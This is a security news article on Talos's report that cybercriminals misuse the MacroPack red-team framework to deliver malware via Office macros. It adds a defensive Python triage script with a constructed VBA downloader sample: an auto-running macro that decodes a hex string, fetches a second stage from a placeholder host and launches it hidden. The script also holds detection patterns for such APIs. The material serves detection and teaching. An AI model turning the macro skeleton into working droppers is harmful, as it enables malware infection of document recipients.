Recent revelations from Cisco Talos suggest that cybercriminals are leveraging a tool originally crafted for red team operations to propagate malware.
This tool, known as MacroPack, is a framework for generating payloads, including Office documents, Visual Basic scripts, Windows shortcuts, and other formats, designed for penetration testing and social engineering assessments. French developer Emeric Nasi is credited with its creation.
Talos has identified various artifacts on VirusTotal, originating from China, Pakistan, Russia, and the United States, all generated by MacroPack. These artifacts were used to deploy several payloads, including Havoc, Brute Ratel, and a novel variant of PhantomCore—a remote access trojan (RAT) associated with the hacktivist collective Head Mare.
According to Vanja Svajcer, a researcher at Talos, “A noteworthy element across all the nefarious documents we analyzed was the presence of four benign VBA subroutines. These subroutines were universally found in the samples, unaltered and unmasked, marking a departure from previously utilized malicious subroutines or similar components elsewhere.”
A significant observation is the diverse range of lures used in these documents. They range from generic prompts urging users to enable macros to seemingly authentic documents masquerading as communications from military entities. This variation suggests that multiple threat actors are involved.
Moreover, some of the documents use advanced MacroPack features to evade heuristic anti-malware detection. They achieve this by employing Markov chains to generate plausible-looking function and variable names that obscure the code's intent, so a heuristic that flags random-looking identifiers does not fire.
The attack chains, observed from May to July 2024, follow a three-stage process: a malicious Office document embedded with MacroPack-generated VBA code is delivered, that code decodes a second-stage payload, and the second stage downloads and executes the final malware.
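The following is an added example for the two observations above (readable, Markov-style identifier names, and the three-stage macro chain); it is not code from Talos, MacroPack, or this article. It triages a constructed VBA snippet the way a defender would: it ignores what routines are called and scores only on behaviour (auto-execution, hex decoding, network client, process launch). A crude name-randomness check is included to show why identifier-based heuristics alone miss samples whose names read like ordinary words. The sample macro, its URL and its hex string are all constructed placeholders.

```python
"""Behaviour-based triage of extracted VBA source (added example, not the article's code)."""
import re
from typing import Dict, List

# Constructed sample: natural-looking routine names, but the staged behaviour
# the article describes. The hex string decodes to the placeholder "noop" and
# the URL is a reserved, non-routable example domain.
SAMPLE_VBA = '''
Sub Document_Open()
    Dim summaryReport As String
    summaryReport = RenderQuarterlyTotals("6E6F6F70")
    PublishLedgerEntries summaryReport
End Sub

Function RenderQuarterlyTotals(packedValue As String) As String
    Dim i As Integer, resultText As String
    For i = 1 To Len(packedValue) Step 2
        resultText = resultText & Chr(Val("&H" & Mid(packedValue, i, 2)))
    Next i
    RenderQuarterlyTotals = resultText
End Function

Sub PublishLedgerEntries(targetPath As String)
    Dim client As Object
    Set client = CreateObject("MSXML2.XMLHTTP")
    client.Open "GET", "http://example.invalid/stage2", False
    client.Send
    Shell targetPath, vbHide
End Sub
'''

# Each rule keys on an API or construct, never on a routine or variable name,
# so renaming identifiers (by a Markov chain or otherwise) does not affect it.
BEHAVIOUR_RULES = {
    "auto_exec": re.compile(r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open)\b", re.I),
    "hex_decode_loop": re.compile(r'Chr\s*\(\s*Val\s*\(\s*"&H"', re.I),
    "network_client": re.compile(r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile", re.I),
    "process_launch": re.compile(r"\bShell\b|WScript\.Shell", re.I),
    "hidden_window": re.compile(r"\bvbHide\b", re.I),
}

ROUTINE_RX = re.compile(r"^\s*(?:Sub|Function)\s+([A-Za-z_]\w*)", re.M)


def match_behaviours(vba_source: str) -> List[str]:
    """Return the names of every behaviour rule that fires on the source."""
    return [name for name, rx in BEHAVIOUR_RULES.items() if rx.search(vba_source)]


def is_staged_chain(behaviours: List[str]) -> bool:
    """Auto-exec + decoding + (download or launch) is the three-stage shape."""
    return ("auto_exec" in behaviours and "hex_decode_loop" in behaviours
            and ("network_client" in behaviours or "process_launch" in behaviours))


def declared_routines(vba_source: str) -> List[str]:
    """Names of Sub/Function declarations, for the name-heuristic comparison."""
    return ROUTINE_RX.findall(vba_source)


def looks_random(name: str) -> bool:
    """Crude identifier heuristic: very few vowels or a long consonant run.

    This is the kind of check that word-like generated names defeat.
    """
    letters = "".join(c for c in name.lower() if c.isalpha())
    if not letters:
        return False
    vowel_ratio = sum(c in "aeiou" for c in letters) / len(letters)
    longest_consonant_run = max(len(run) for run in re.findall(r"[^aeiou]+", letters) or [""])
    return vowel_ratio < 0.2 or longest_consonant_run >= 5


def triage(vba_source: str) -> Dict[str, object]:
    """Combine the behaviour rules and the name heuristic into one verdict."""
    behaviours = match_behaviours(vba_source)
    routines = declared_routines(vba_source)
    return {
        "behaviours": behaviours,
        "staged_chain": is_staged_chain(behaviours),
        "routines": routines,
        "random_looking_names": [r for r in routines if looks_random(r)],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the constructed sample the name heuristic flags nothing, because every routine name reads like an ordinary phrase, while the behaviour rules still identify the auto-executing, decoding, downloading and launching chain. Real triage would extract the VBA from the document first (for example with a macro-extraction tool) and feed the source text to `triage`.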
This development underscores a trend where adversaries continuously refine their strategies in response to disruptions, adopting increasingly sophisticated methodologies for code execution.